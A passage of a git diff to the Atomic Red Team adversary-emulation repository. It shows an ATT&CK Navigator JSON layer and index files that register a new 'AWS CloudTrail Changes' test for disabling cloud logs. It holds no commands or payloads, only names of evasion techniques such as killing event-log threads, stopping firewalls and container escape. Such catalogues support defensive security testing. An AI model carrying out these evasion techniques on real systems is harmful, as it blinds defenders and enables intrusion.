:100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redca
naryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/
blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco
/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.co
m/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":tru
e,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":
100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1
555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID
":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techni
queID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"t
echniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1
574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 2b76f2d9..b49f990a 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -278,6 +278,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh defense-evasion,T1610,Deploy Container,1,Deploy container using nsenter container escape,58004e22-022c-4c51-b4a8-2b85ac5c596b,sh defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell +defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index 5570cf12..a87b19bb 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv 
@@ -71,6 +71,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh defense-evasion,T1610,Deploy Container,1,Deploy container using nsenter container escape,58004e22-022c-4c51-b4a8-2b85ac5c596b,sh +defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh defense-evasion,T1562.004,Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh defense-evasion,T1562.004,Disable or Modify System Firewall,8,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh defense-evasion,T1562.004,Disable or Modify System Firewall,9,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 68898e7c..cfa4b82f 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -502,7 +502,8 @@ - Atomic Test #1: Deploy container using nsenter container escape [linux] - [T1006 Direct Volume Access](../../T1006/T1006.md) - Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows] -- T1562.008 Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1562.008 Disable Cloud Logs](../../T1562.008/T1562.008.md) + - Atomic Test #1: AWS CloudTrail Changes [iaas:aws] - T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md) - Atomic Test #1: Disable Windows IIS HTTP Logging [windows] 
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 58056a51..d8878c2a 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -189,7 +189,8 @@ - Atomic Test #6: Hex decoding with shell utilities [linux, macos] - [T1610 Deploy Container](../../T1610/T1610.md) - Atomic Test #1: Deploy container using nsenter container escape [linux] -- T1562.008 Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1562.008 Disable Cloud Logs](../../T1562.008/T1562.008.md) + - Atomic Test #1: AWS CloudTrail Changes [iaas:aws] - T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md) diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index 0dd361b8..f84a275e 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md 
